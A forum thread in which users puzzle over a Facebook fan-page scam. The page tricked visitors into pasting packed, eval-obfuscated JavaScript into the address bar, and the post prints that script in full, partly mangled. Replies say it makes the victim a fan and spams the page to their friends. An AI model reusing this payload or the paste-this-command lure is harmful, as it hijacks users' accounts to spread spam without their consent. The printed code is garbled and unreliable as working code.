Facebook fanpage attempt at running obscure proected javascript?



  •  I was on Facebook (TRWTF) and I got a message about a friend who "liked" something and recomennded it to me so I went to the page and it said:

    To view the message, Hold down Ctrl -> C

    Upon doing that it gave other instructions to press Alt -> D and paste and enter, so I checked out the code I copied to my clipboard... It contained the following:

    javascript:(function()
    {a='app4949752878_jop';b='app4949752878_jode';
    ifc='app4949752878_ifc';
    ifo='app4949752878_ifo';
    mw='app4949752878_mwrapper';eval(function(p,a,c,k,e,r)
    {e=function(c){return(c<a?'':e(parseint (c="" a)))+((c="c%a)">35?String.fromChar
    Code(c+29):c.toString(36))};if(!''.replace(/^/,String))
    {while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function()
    {return'\\w+'};c=1};while(c--)if(k[c])p=p.rep
    lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}
    ('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\
    h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\
    j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q
    \\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\
    v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\
    p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]]
    (V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)
    [e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]]
    (e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);
    C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]]
    (c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|
    x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|
    x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|
    x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();</a?'':e(parseint>
     

    I am not a javascript expert but I know what eval does... I just can't figure out what exactly it's trying to do... :-/



  •  As far as I can tell, it "suggests" the page to all your friends and makes you a fan of it as well.  At least that's what happened to my friend when she did it



  •  But why did they have to make you run it? They had a very nice Javascript animation to animate all the steps you needed to do :S



  • To make those who are curious but don't want to send the link to every single one of their friends send it anyway?



  •  So ... Can someone tell me what fanpage this is?  I don't have the patience to decrypt it or any of that bullshit.  I just want to know where to direct the Anthrax.



  • @belgariontheking said:

    not the band<input name="ctl00$ctl00$bcr$bcr$ctl00$PostList$ctl06$ctl23$ctl01" id="ctl00_ctl00_bcr_bcr_ctl00_PostList_ctl06_ctl23_ctl01_State" value="value:Filed%20under%3A%20%3Ca%20href%3D%22%2Ftags%2Fnot%2Bthe%2Bband%2Fdefault.aspx%22%20rel%3D%22tag%22%3Enot%20the%20band%3C%2Fa%3E" type="hidden">

     

    YEAH, RIGHT



  • This looks very similar to the packed form of jQuery's source code.



  • @toshir0 said:

    This looks very similar to the packed form of jQuery's source code.
    http://dean.edwards.name/packer/



  • @Xyro said:

    @toshir0 said:
    This looks very similar to the packed form of jQuery's source code.
    http://dean.edwards.name/packer/
    oh, so they used some external packing tool ? I didn't know, thanks for the link.



  • @toshir0 said:

    Filed under: crap maybe politeness and curtesy are sufficient griefs to be banned here
    Nah, don't interpret the terse reply as impatience or condescension, I just figured the link spoke for itself.


Log in to reply